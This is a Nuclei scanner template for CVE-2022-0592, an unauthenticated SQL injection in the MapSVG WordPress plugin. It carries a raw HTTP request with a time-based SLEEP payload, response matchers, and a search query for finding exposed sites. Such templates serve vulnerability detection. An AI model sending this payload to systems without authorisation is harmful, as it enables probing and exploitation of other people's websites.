漏洞描述
The MapSVG WordPress plugin before 6.2.20 does not validate and escape a parameter via a REST endpoint before using it in a SQL statement, leading to a SQL Injection exploitable by unauthenticated users.
id: CVE-2022-0592
info:
name: MapSVG < 6.2.20 - Unauthenticated SQLi
author: DhiyaneshDK
severity: critical
description: |
The MapSVG WordPress plugin before 6.2.20 does not validate and escape a parameter via a REST endpoint before using it in a SQL statement, leading to a SQL Injection exploitable by unauthenticated users.
reference:
- https://wpscan.com/vulnerability/5d8d53ad-dc88-4b50-a292-fc447484c27b/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-0592
cwe-id: CWE-89
epss-score: 0.55634
epss-percentile: 0.9801
cpe: cpe:2.3:a:mapsvg:mapsvg:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
vendor: mapsvg
product: mapsvg
framework: wordpress
fofa-query: body="/wp-content/plugins/mapsvg/"
tags: wpscan,cve,cve2022,mapsvg,wordpress,wp,wp-plugin,sqli,time-based-sqli
http:
- raw:
- |
GET /wp-json/mapsvg/v1/maps/2?id=1%27%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(6)))b)--+ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers:
- type: dsl
dsl:
- 'duration >= 6'
- 'contains(body, "map")'
- 'contains(content_type, "application/json")'
- 'status_code == 200'
condition: and
# digest: 4a0a0047304502202812e5da18a42d3271360f22ef234d277df8bdb6d78034ea4fa8815bf4c4ac6c0221009828c99102a23bc1e95c2fdcc314cd6c0f08b0dcdd7491f1fb03a8bc84a21b7e:922c64590222798bb761d5b6d8e72950